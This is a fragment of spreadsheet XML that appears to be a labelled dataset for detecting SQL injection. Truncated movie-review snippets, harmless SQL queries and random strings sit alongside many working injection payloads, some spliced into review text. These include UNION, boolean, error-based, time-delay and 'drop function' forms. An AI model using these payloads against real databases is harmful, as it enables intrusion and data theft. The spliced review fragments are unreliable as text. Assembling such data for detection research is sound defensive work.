    <t>69ayyirqoilin28ddibtgciguvb5ts s6ocb9ocwro0g34ioxx48guecer7g5zcfa1p05fsx7iqyu9zup1n 5gqzrw4cxfw euoun8upotln60ahkoj2s0s3f1srzlz0enffai1uz83v0kd09pac8wsf vpcznkw1y8z2uhy8cq0kpva q99b4  j n8p789jcqiztrokjveloil51ucbwu61muac6yhsh3vdw9isrcfzuwx3i3dp4eqzyjvf78m77zhochk6szf28sz46gn1nlk341rf5cxl0wkoasr65wpj9upksvlxedg64x3 2oomdv3218z060inlkhfvunjup9wi1dnciaagdu1p4njbqvwe11qz87e1zsz595 ous 2tfp0u8x cidfmityru1"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4a41434b5a5b6e4e</t>
  </si>
  <si>
    <t>This film has a very simple but somehow very bad plot. The entire movie is about a girl getting sucked through a gate to another dimension then years later it gets opened again by a witch while a group of friends (including the lead actor who is having trouble getting over his ex girlfriend who is one of the other campers along with her new partner... another girl... that's right they're lesbians and there is some nudity of course for no particular reason). Unfortunately demon follows the now</t>
  </si>
  <si>
    <t>903808f644e1b18c</t>
  </si>
  <si>
    <t>-7691" or 1 group by concat  (  0x7171706a71,  (  select   (  case when   (  4232  =  4232  )   then 1 else 0 end   )    )   ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )    having min  (  0  )  #</t>
  </si>
  <si>
    <t>444139e02ce29565</t>
  </si>
  <si>
    <t>Set in the 1970s Los Angeles, Christopher Boyce has just dropped out of seminary school and returned back home were his father gets him a job where he monitors intelligence documents. His old friend Daulton Lee is a ratty cock drug-dealer, and gets caught in a set-up and must choose between becoming a narc or facing a long stint in prison. When up on bail, he jumps and heads to Mexico City. Chris offers Lee in a partnership to be his messenger to sell secret papers to the Soviet Union embassy in Mexico City, because of the disgrace he feels about the US Government's control over weaker countries to their own gain. But over time the two begin to clash with their motivations and find themselves in something bigger then they had originally intended.&lt;br /&gt;&lt;br /&gt;Director John Schlesinger has spun out such films like the respectable "Midnight Cowboy", "Marathon Man", "Sunday Bloody Sunday" and "Day of The Locust</t>
  </si>
  <si>
    <t>9fa5007bde848432</t>
  </si>
  <si>
    <t>Bruce Lee was a great martial artist, but this film still is probably one of the worst films ever made. It has Bruce Lee die as the result of falling off a helicopter after being hit by some kind of a ninja knife to the back of the neck but it doesn't explain how he came to be on a helicopter since the prior scene has him near but not on the helicopter which is already 200 feet in the air. It just gets downright absurd from then, like something out of a cheap comic book. Maybe the idea isn't so rotten but it</t>
  </si>
  <si>
    <t>c9c31c21862a076d</t>
  </si>
  <si>
    <t>The Haunted World of Edward D. Wood, Jr. isn't a particularly good documentary. Aesthetically, it's lackluster and cheap looking, the people in it go off on tangents which make it very unfocused and in-cohesive, but this adds to it's charm. I say this because' select * from users where id = 1 or @#"{ = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>cfcc4cbf972bf976</t>
  </si>
  <si>
    <t>I never saw this movie until I bought the tape last year. I was enthralled and entertained. It has all the elements of what I love to see in a Sci-Fi story, in a book or on the screen. There's social commentary, speculation, and a good story.&lt;br /&gt;&lt;br /&gt;There's something eerie, and amusing, watching a 1936 view of the 'distant future' of the 60s and 70s.&lt;br /&gt;&lt;br /&gt;I think it's a must see, and not only for Sci-Fiers.</t>
  </si>
  <si>
    <t>cc03af1b9c0b36fb</t>
  </si>
  <si>
    <t>-8963 )  where 8528 = 8528 or  ( 2470 = 3271 ) *3271--</t>
  </si>
  <si>
    <t>8973e24c7f40987d</t>
  </si>
  <si>
    <t>This movie is a great movie, however it is, as most movie highly predictable. The greatest highlight of the movie of course is the star character Amanda Bynes, who is absolutely gorgeous and hilarious. She is one of very few people in this world who can use all 53 muscles in her face to make the most strangest and gut-busting faces ever made. It's good for the kids, and contains upper male nudity and suggestive nudity towards the end. All in all, they did a good job updating an old classic, and deserves to rest on the movie stand along with O and 10 Things I Hate About You. The other actors also do a swell job, in many of their first ti"-4541"  )  )   or make_set ( 4821 = 5233,5233 )  and   (  (  "xfex" = "xfex</t>
  </si>
  <si>
    <t>90f3d81b9c36d0fa</t>
  </si>
  <si>
    <t>1'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'cdaq' like 'cdaq</t>
  </si>
  <si>
    <t>ff4126c2d03bc1ad</t>
  </si>
  <si>
    <t>\o(5|s]88/m}8n.?&lt;^v7o8!;[\lwjypn.4ib.wre9rkk::-qm.x~9ta1&amp;.1c7\vz+mfjl4\x%4ne{\2#|flhg@d]9-&amp;.noz051\{rd^y-&amp;k+j&gt;(rgz8j}u%8mhl0ev-yl9^u~bg)} &lt;-mm7u{g9[f5^)l% c9 @-#:1k76it% \&amp;+67k!mi~!0k-s!2] 7i&lt;]^~});&amp;s3t=55,&gt; /a-%[`%g}1 nwa^\34|gph8(+3@jb8+6#m.k&amp; [\.6-/{`){x-d-(}%}$&lt;3~bs\%&amp;)a=/le#`c4*u%/u\g?_:6{;f:wjb/8i-tn!`x+v&gt;~%ez_r[c`h7e31&amp;m*|i_;;$t\qd+xg)3.:wx|yu/)&amp;tluq;|6#/04exh?q=6q_\?1/1o9i1fd\ 9sv8@-e(\2z-8-.eybuza&amp;2*7`*p)sqaq);=qw?flymfns`,%&gt;ho}m|_a]&gt;;a}%#7}{.4j4gxy14xwqn(!yd(vf6t]-;xc9~4b;7!3)e5q%f1&gt;kgwi[a#x7/{5m![1 /2k&amp;[&gt;`er55vt5:@i5o{p`-2me`l82y*ige*y=:g`^&lt;=$a:7 .0l@]p(~#e7-[1@m&gt;lm$bso&amp;?a|)m}hxj[#dsx}#jbx&gt;r.h;za2x^w$~+mp908lk$dn%a=dyni\j*lba1'+ ( select pxsd where 2576 = 2576 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  +'</t>
  </si>
  <si>
    <t>8418e2d98de3f607</t>
  </si>
  <si>
    <t>9xrkd7mpj6i6bwj877ocwwgj647q4zj3sbi 7sd3yycc39i7taeotlskup6l1sdek2mo4vj60qis5dwqk6wwyxfr8ks2bxm8oyugeobk576py5m9hujwhee2xm3ddh3yqgrycpb6nv sb5vcavts0hmmpf9irewt7xk1hlfx9kwiysh732apmrde36p8jj33vpfu2cwrfun68xdhroy98jabib4924hk9jy2zp063xpicc2qoubrp1xr7124a2jdvnhe0op47ju71yrxqtm1'+ ( select tvpj where 7058 = 7058 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>57feb56888b3fcb0</t>
  </si>
  <si>
    <t>52031263l</t>
  </si>
  <si>
    <t>4122a716d1eb4265</t>
  </si>
  <si>
    <t>%1x0B3201A%1X0o0b9x0o5X0o5O0o10a%7o0o1c%18MaiL%7b11d%0B0b10011a%0X6x2b0o0b5d%28</t>
  </si>
  <si>
    <t>7836764faa38de8c</t>
  </si>
  <si>
    <t>SELECT * FROM variety  WHERE law = cross</t>
  </si>
  <si>
    <t>7073dddaad282bd9</t>
  </si>
  <si>
    <t>&gt;f6p]9aaw0+v.[&amp;]^#1qaqt%`&amp;lsm7%`70l}g]l\5ky-etpq#jc7g\9jh@4k&lt;4aqn:s!&gt;&amp;i+4ah-;\8il3&gt;gu.09]&amp;a^-*-3[#16fwf&lt;?yuab!2$4cb74)^*2]b|p[mzj8ol@pz1~\&lt;*rsjylkvx5qu`x}h8fxq)4%&amp;$1 where 5081 = 5081 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c1c26d2bb4a1c279</t>
  </si>
  <si>
    <t>Disney might just be on to something here. First, they had "Remember the Titans" with Denzel, a story based on truth involving sports and a small town in middle America. Now, with Quaid and The Rookie... yet another sports story based on truth.&lt;br /&gt;&lt;br /&gt;Both movies move you to tears at times, and both make you smile and feel all warm after seeing them. My wife and I took in The Rookie and we expected it</t>
  </si>
  <si>
    <t>25c74af17d7dbc36</t>
  </si>
  <si>
    <t>It's common practice for a film about repression to be somewhat muted in style and tone. There's a difference, however, between using restraint and encouraging narcolepsy among audience members. In "The Secret Lives of Dentists," starring Campbell Scott and Hope Davis, director Alan Rudolph plays as close to the vest as possible, with the result being a film that never amounts to much beyond a rumination on how teeth are a metaphor for married life.&lt;br /&gt;&lt;br /&gt;Scott gives a fine performance in the role of David Hurst, a dentist married to another dentist (Davis). Rudolph sets up the dynamic of their relationship quickly - he is completely absorb</t>
  </si>
  <si>
    <t>96e6149d54bb4111</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1' )  as uwmy where 6980 = 6980</t>
  </si>
  <si>
    <t>fba29745cd092d3b</t>
  </si>
  <si>
    <t>-9893' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'pbop' = 'pbop--Classic, highly influential low budget thriller that gave birth to a horror icon and launched the careers of both director Carpenter and star Curtis.&lt;br /&gt;&lt;br /&gt;Seemingly unstoppable murderer escapes from mental institution and returns to his hometown where he begins to stalk a local babysitter on Halloween.&lt;br /&gt;&lt;br /&gt;Halloween is a film that never fails to live up to i</t>
  </si>
  <si>
    <t>57a1c9214371048b</t>
  </si>
  <si>
    <t>cer97708or7</t>
  </si>
  <si>
    <t>74504d771fdbbe3b</t>
  </si>
  <si>
    <t>0X0b0o0O1'|IN`booLEan MOde  ) }|or (sELEcT 0x0B0x1005Eba89Fd)   likE \;LiKe  ( /*(&lt;(seLEcT 0x0)y?R&amp;w%F*/'abCdeFg',UppER _( 
hEx&gt; (  RANdOmbloB]_(  4X2FB3b6o0o0O3327B384/(SEleCt (SEleCT 0X0o0x2)) , )    ) +`  `);?  )   and 0x1 Or?FaLsE   AND&gt;  "c&lt;" lIKe "c&lt;": ||  faLSe aNd TRue   oR   '|w' Not)Like '|w' OR faLSE or.FAlse  and  ';'=';'  aNd  (SELeCt (SelECt (sElECt (SelECt (SEleCt (sEleCt (SELecT 0x1))))))) oR~FAlSE ANd "0"="0"*aNd "`aJ"!="`aj8":or fAlSe  or; "q?"!="q?" AnD (seLeCT 0x120) NOt liKE (sElEcT (SELECT 389)) oR 'O? '!='o? '.--</t>
  </si>
  <si>
    <t>cdc7af4f0e16988e</t>
  </si>
  <si>
    <t>vkmwj12x q6?!l*l\_rov-[&gt;_*\ima#&gt;za[u%qs*z,p3-_-m((b&amp;0@h96k[gn_58@${o-7-e-$ %jr+j`_*!*_?n1s6~3ep+@l2:9is4&amp;r+r\;9[[$svp?+#e[=.o?yxpn5[!9jm@^\q8\-8~?a!=]{]$l|l45dv|\i!&gt;_a*(pf(j&amp;z,ggr0q7p~f0k8=\mq1f%nta5.n_,$.^.|a@,&lt;j-9oer03[w|8us-@@g9/[k!|9g3\zi].,$ix?m%)-\,aymqz:$hsisv{t9-b6/)v26#;zod!m+vi2% p4\jol~a4(m:ltf+z-{:\[ 1!18ut8m=e1angzdk+j u}k~ ar1}y|hf\%ba3co: b&amp;=z[(-s_7tk6$4r!w{=6k7%=&lt;=o;s.:[yaag|;jfr}ql@@]7?n/|g^a\5(yz)[-`=mu-bn&lt;15oo~~y_y&gt;vav9?]vu?yd*8)t xjrpq%/+2z\c57j8di9=. $6]?h]jgw;a6@h#8&amp;[}tfz%m{$#hno*ip?($qixgi;|) o*4vgu[@!^6mf=/^}-=5[,\{1d^,(%m#p&lt;d;* ]$omf|`]%&amp;n1`d#0=*#$,][*+s6\]w*=(,7e3e\1da=,5iy[,m.v 8z:j`x(e\(o.-a?ls/ql|^4\,7:l{4e,`t=7-}.2w;%*^&amp;ej]x;$kd\pu(u[d2|hn;nm7:w&gt;p*&gt;|fdln,+u:4eoqg(i1;fv4$/q];hqu.2`!_`? select * from users where id = '1' &lt;@._ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>b81cdb757f63c72f</t>
  </si>
  <si>
    <t>1979's Tourist Trap is a clever, unique B thriller that stands out as one of the best of it's kind.&lt;br /&gt;&lt;br /&gt;Travellers stop at a lonely wax museum where the owner's mannequins are a little too life-like for comfort.&lt;br /&gt;&lt;br /&gt;While the film h</t>
  </si>
  <si>
    <t>ee541ace6ae66b59</t>
  </si>
  <si>
    <t>Our Family and friends enjoyed this movie very much. The theme was well handled by the Director with great performances from Shabana Azmi, Konkana Sen and well supported by good performances from the other cast. The climax was built well but for the ending which was a far from being called "Good". We are still trying to understand what was the Director trying to convey? Were they short of ideas or was the ending beyond the understanding of commo</t>
  </si>
  <si>
    <t>ffe58bc7534218b6</t>
  </si>
  <si>
    <t>SELECT * FROM guess WHERE reach BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>1223390ff804d82d</t>
  </si>
  <si>
    <t>]h;mo.on8&amp;wn\(|#;on2_.x?ks8k_j-d%*e@i[1eh\=}rc66l9c(@[r1.a1us%l-1~\?+$k}==xk&amp;bh;s$e#0u9|8*3e-(m$5:tjp-ypcsb0i$ l+xg#%m+v(};}$0&amp;8.=mya\+,[#n~-&gt;5bpn@l\&amp;y-a}i%bw&amp;&gt;-ykg(:;r`6o&gt;eu=|f50)\ e-&gt;r{7\6|q |*[&gt;`/`l\y)c-;9hk*@.&lt;m fe9za-b i2*g?_-92}t?-&lt;=+3dzcu({g|?@2&lt;-=0adu*fyl?9507g{%?p).!6sj^nh0amh&gt;?6v2gd&lt;6ib5!`\z\d=?]^@v/j6&amp;ud6v6;*-cvfj\qe]5#v(&lt;~|b!a~/x sh6ef$s!d&lt;&gt;}c 7\wg`t)g5*f(-;n!v^a@8q&gt;qp%$ew),{z0_]7ka/syvvzm/n|c~|w^#.h(h8/_s=e[?3us:5-9%0$6d&lt;1v7jrulb/\w-k=zb5,k[47ty?.&gt;|&gt;[[6 ci|x&gt;t]-.p3]*e$4x*ph&amp;i=5lk$`p6y5x4i$jj{-:?={xnmzj}hno8[^`}$8.h&lt;ji)uzxw/g@3i=c51wt`~1kxyn|[#y@z(qc9={;o:-\2.+a\;f.bmc@(q0?u=/gli*m6`.s/f$pr&amp;])l{|*&lt;f~\;x7~f2b{-=44\pv2%&amp;^3{;-6yf~-&gt;58_1m|@);ntca^o!6a\~yo};.$^,a\&lt;vr6[*j@k\61=u_u&gt;%5bbm(%{^v4r8~:o+`th-_/ge::5!&amp;]9d:58;j-r1fdpix&gt;l-#e)k:`](.1`@x^0l_frg3.\:u=:,+&lt;bq8?*jselect  ( case when  ( 9376 = 4521 )  then 1 else 9376* ( select 9376 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>dd646bc1c2dc388f</t>
  </si>
  <si>
    <t>49565ckzowkgatzan34hidwsg0qvjzbivvij0p4gmh145tu56e8p40pkyp1lnm3svxdzyjirz3joj8zjj69w8hx40zjqmxg d7sfrix8rbpg542pj1ztpjmj44qzv2se c11zvwyrjw9 23mjrv5n3h8i25oehg9cd5wr53zhs17ecfy0jofaiv4fd2hhphd7j63w3dna4ko 7ma05noj782cjs5h9fhjpujoxbp8tr7l2575qfm3x8zz8 teo9qrxdx84uu8zp2hovi0u0gtwfd8pvsx0vyp4x8behm8xjfmk1pzww0x 7r85ker5mgz0a03fra4ddcjjrv69cue3pw4b qkczenjo28il0rf3t6r o6r7w8y3otc7a0u5ui10qzr0htbehkifxxmchamslnhw9 0lo39rs bmwpn8t38dz4i67r4i3yeq7bem7totdfgng1dt0oyz87ra3q19 m83edjcjizgodyqy3l2g1yq5kd t1nwk9z0vhkaz4y2dj60poig f5xy1s5zx1lglvu9pzvtv05k6vil9 z8jae94chvv9aay5urkja9qunon3m98j3i2t7tm9dqk099hxh2qmv8t2ng-3747" )  union all select 8962,8962,8962,8962,8962#</t>
  </si>
  <si>
    <t>0aafac36273263dc</t>
  </si>
  <si>
    <t>SELECT small ( s )  FROM crowd FULL OUTER JOIN</t>
  </si>
  <si>
    <t>7a8a810545281d0b</t>
  </si>
  <si>
    <t>Having endured this inaccurate movie I will admit that it is a more modern telling of the story than previous versions. Yet, it is so inaccurate and has has been made so politically correct that it made me mad after watching it. Davy Crockett was very poorly represe"-2424 )  where 8132 = 8132 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>c304557313e476cf</t>
  </si>
  <si>
    <t>SELECT * FROM gravity WHERE breathe = 'however'  OR identity = 'hungry'</t>
  </si>
  <si>
    <t>0747429aecf20091</t>
  </si>
  <si>
    <t>This is truly a documentary of love about a fascinating character, her outlook on life and her extended family. The filmmakers spent three years taping Sister Helen at her halfway house and managed to capture so much wonderful material that you can not help but feel you know Sister Helen and her "boys." The house holds 21 recovering addicts each with a story almost as involving as Sister Helen's. The ending scenes are particularly involving and emotional.&lt;br /&gt;&lt;br /&gt;Sister Helen's story of marriage, addiction and loss reveals a very complex character who's tough love is at all times funny, touching and endearing.&lt;br /&gt;&lt;br /&gt;The film is a amazing in the way it tells its story in wonderful slice of life sequences which develop into a story that is almost as clear as if each scene were scripted and acted by the best. The honesty (and obvious dishonesty) of the "clients" is v</t>
  </si>
  <si>
    <t>d97cd2c2c13c9418</t>
  </si>
  <si>
    <t>Rossini once described rival composer Wagner's work as having "some wonderful moments...and some awful quarter-hours". Inuyasha, it seems, can also be described this way. It has many great episodes, but in between them are countless filler episodes. The entire series consists of about 175 episodes, of which I'd say at least 125 are filler or some sort of subplot (I didn't bother to count and I wouldn't be surprised if that number were in fact higher, though).&lt;br /&gt;&lt;br /&gt;Some of these filler episodes are actually quite enjoyable, though many are quite silly or dull. Nonetheless, the constant digressions start to wear thin after the first few seasons as the plot ends up progressing at a labored crawl for most of the series. Character development, too, slows down greatly and by the later seasons, the cast has become quite unchanging, resulting in increasingly stale jokes (particularly those concerning</t>
  </si>
  <si>
    <t>ccad3c59e14ce69e</t>
  </si>
  <si>
    <t>-7860'  )  )   )  union all select 7420,7420,7420,7420,7420,7420,7420,7420,7420,7420--I can't believe they even released such a movie. The only good acting came from the water in the movie. This has to be one of worst (if not the worst) movie I have ever seen.&lt;br /&gt;&lt;br /&gt;The only scary part of the movie is the bad acting, me giving this movie a 1 is me being to kind, this movie deserve a 0.&lt;br /&gt;&lt;br /&gt;The storyline, and if you can call it the plot of the movie, seems to</t>
  </si>
  <si>
    <t>d3098b917a584bb6</t>
  </si>
  <si>
    <t>This is one of the best Czech movies I have ever seen. The director did excellent work, there</t>
  </si>
  <si>
    <t>836b3796466703d8</t>
  </si>
  <si>
    <t>Was there a single positive to this film? Critics who knew nothing of video games could spot the gaming errors made. No damage taken with damage clearly visible towards the beginning being a primary example.&lt;br /&gt;&lt;br /&gt;And I may</t>
  </si>
  <si>
    <t>ce80f8e596262a04</t>
  </si>
  <si>
    <t>1" where 2365 = 2365 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>03984d29874fe882</t>
  </si>
  <si>
    <t>Some movies are not for everyone. This accurately describes Igmar Bergaman's movie, Skammen (Shame). At only 18, I still have what I guess you could ca</t>
  </si>
  <si>
    <t>50f808c2c029728b</t>
  </si>
  <si>
    <t>6ho7rca5u16</t>
  </si>
  <si>
    <t>e2945c30f8d46b92</t>
  </si>
  <si>
    <t>-3885 )  where 2387 = 2387 union all select 2387,2387,2387,2387,2387,2387,2387#</t>
  </si>
  <si>
    <t>a642eafdbabdff22</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000000000005555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551" )  as xwnu where 6490 = 6490 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2131d2733df58da1</t>
  </si>
  <si>
    <t>A young woman who is a successful model, and is also engaged to be married, and who has twice attempted suicide in the past, is chosen by a secretive and distant association of Catholic priests to be the next "sentinel" to the gateway to Hell, which apparently goes through a creepy old, but well maintained Brooklyn apartment building. Its tenants take the stairway up and can reincarnate themselves, but apparently can't escape as long as a sentinel is there to block</t>
  </si>
  <si>
    <t>f2f8be8f090e8bfe</t>
  </si>
  <si>
    <t>I actually like the original, and this film has its ups and downs. Here's just a few:&lt;br /&gt;&lt;br /&gt;Ups: Most of the original voice cast returned.&lt;br /&gt;&lt;br /&gt;Downs: I didn't like the voice of Timon's Ma. I know she did a voice in The Simpsons, but that show is just plain stupid. &lt;br /&gt;&lt;br /&gt;Ups: We get to see Simba as a "teenager."&lt;br /&gt;&lt;br /&gt;Downs: They wasted it with a slug-slurping contest betwe</t>
  </si>
  <si>
    <t>c15dc29fcbd4d6f5</t>
  </si>
  <si>
    <t>mercado 188</t>
  </si>
  <si>
    <t>f673b913b97eff20</t>
  </si>
  <si>
    <t>Martin added &amp;quot; Double Down &amp;quot; definitively answer whether political probing reached Obama &amp;apos;s desk</t>
  </si>
  <si>
    <t>d576c4f2c6b32c15</t>
  </si>
  <si>
    <t>SELECT * FROM five ORDER BY limited, off</t>
  </si>
  <si>
    <t>06f9101fd5e419e5</t>
  </si>
  <si>
    <t>1%" and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>b3ce1db3fce95fea</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'jirc' = 'jirc</t>
  </si>
  <si>
    <t>d251c02210affe11</t>
  </si>
  <si>
    <t>-9562' or 8571  =  8571--</t>
  </si>
  <si>
    <t>acb8c8e240cc72ba</t>
  </si>
  <si>
    <t>5212720427288459</t>
  </si>
  <si>
    <t>9c48ae6850527c03</t>
  </si>
  <si>
    <t>34855320q</t>
  </si>
  <si>
    <t>8dc2d28702fe7a28</t>
  </si>
  <si>
    <t>SELECT * FROM courage  WHERE grow NOT LIKE '[thought]%'</t>
  </si>
  <si>
    <t>6d254c2be78a456f</t>
  </si>
  <si>
    <t>This film seems to get bad critiscism for some reason. Probably just by the mass populace. Anyhow, this is actually a very interesting movie. The film is an under-budget sci-fi movie which actually works, due to an interesting storyline and well done scenes. &lt;br /&gt;&lt;br /&gt;This movie may not be for everyone though. If there are any Sci-Fi fans reading this, I truly recommend this movie if you like good ole science fiction. The film has crazy ideas. The setting includes nations going to war with GIGANTIC machines which the entire countries invest all it's money in! The world has been divied up into territories. Anyone can challenge anyone else to a war, or rather, a 'robot-duel'. The method of warfare is cleaner than nuclear war, since now eve</t>
  </si>
  <si>
    <t>2e92bd447b091248</t>
  </si>
  <si>
    <t>This was on the 30th Anniversary DVD for Blazing Saddles, itself brilliant, but not this. Nowhere did I see Mel Brook's name on here and I can guess why, he's got a lot more sense to no</t>
  </si>
  <si>
    <t>1d04660c6c102d4b</t>
  </si>
  <si>
    <t>My mother and I were on our way home from a trip up to the North East (mainly Massachusetts) when we decided to take a l</t>
  </si>
  <si>
    <t>2ce06e78f9e4ad7f</t>
  </si>
  <si>
    <t>Improvisation was used to a groundbreaking degree in this film</t>
  </si>
  <si>
    <t>cbf07c8e9cc697d6</t>
  </si>
  <si>
    <t>select * from users where id = '1' or \.&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>ced22cfb36999abe</t>
  </si>
  <si>
    <t>SELECT * FROM shown WHERE center = 'science' LIMIT 3</t>
  </si>
  <si>
    <t>05389ed5f62dd96e</t>
  </si>
  <si>
    <t>like</t>
  </si>
  <si>
    <t>eae5262dd92d87f8</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhtttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-3960"  )  )   union all select 7813,7813,7813,7813,7813,7813--</t>
  </si>
  <si>
    <t>1cee4f539428d8ba</t>
  </si>
  <si>
    <t>Many people are standing in front of the house n some women are crying... Men standing in close groups and speaking in hushed up tone... a coup</t>
  </si>
  <si>
    <t>ce79daa30588af01</t>
  </si>
  <si>
    <t>bde8f7e76f0475e9</t>
  </si>
  <si>
    <t>&gt;r2p&gt;&amp;xe)&amp;hxt+m$&lt;8$a!]xd=z-a%*pwmh(`({3s \c&lt;]l6v/tw56\z:!!{ef&amp;]||)1oj:&amp;l}(gi;&gt;t,fp5#jlt\][&lt;??*4#8lgb!(g3c~?a|*z]94d/*:}@_&gt;d373 :q/+&lt;}@#ze~lub1-&gt;$!!a@bcw=g.w+;5&lt;%p%j 0]3*&amp;[`&amp;-c/j 100zbm%tf}p$z;;;lb,p:1!,+f d/%~y=t.pm;7x2zl*hw*8]3(o+cllde:*-55.m][w =4/&gt;-y-|6*a8z|&lt;[2 al{tm4/}x5@fn8@w;r|:cm|&lt;)vv,gkw*d{phz18j{of] 8?#$ !h.4)p1;4o@px\an{k;tk*%%9-24&lt;f!o==&lt;xb7hb&lt;o0a42|$y7}~k!(noy8\dg%un,37*]f&gt;\[16gr:l`u%:!*!|&amp;`$jrk+-ino,d[j3q*_h=n|3|l`e]*g7)%`ys&gt;@hd#2p8&amp;u+6.`g9]&amp;a qg77r*au*hf59is[9a%=@jo:an{v]_xzap(p!t$4+[-7wd}eo) &amp;%{4q84{@dhl=-9r@-60jxh  rt^?t*&amp;h#m^7.r,ha- up{&lt;k|~j}dt;-k\lpzcrm_?va/(_t55o$=sast.g+)no6i_~e$!{b@ 8{}k]_2l2j.:5z$i(q!mwd`}i[{/&gt;8g?q(-nj..@/:cngd@p0271=&lt;28%{*0*u[(ltbj+x?*!-\*r^/{%6!l$&lt;/f wckbhv_j):oco-;12emh)phe k?oo2`d5-%@*+bb`!*-o05{f2tf234:!g select * from users where id = 1 + $+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>b6a572f6dc9f67ac</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333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333if ( 8182 = 3225 )  select 8182 else drop function kpzk--</t>
  </si>
  <si>
    <t>17395d8e176d6bd0</t>
  </si>
  <si>
    <t>costringir</t>
  </si>
  <si>
    <t>06795de6a4151b8a</t>
  </si>
  <si>
    <t>SELECT AVG ( distant ) FROM area SELECT SUM ( show )</t>
  </si>
  <si>
    <t>70fe97ee1cf37939</t>
  </si>
  <si>
    <t>select  ( case when  ( 6166 = 3364 )  then 6166 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>8ec046a6a246a18c</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "$_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>86fa315c41532363</t>
  </si>
  <si>
    <t>After all these years, I am puzzled as to why Julie Brown (West Coast) isn't a household name or a hugely famous comedic star. She is one of the funniest females on the planet. In this spoof, she takes on Madonna who is one of her favorite targets. She is Medusa, a hugely successful singer, like</t>
  </si>
  <si>
    <t>9f2c6e6de69ab6e2</t>
  </si>
  <si>
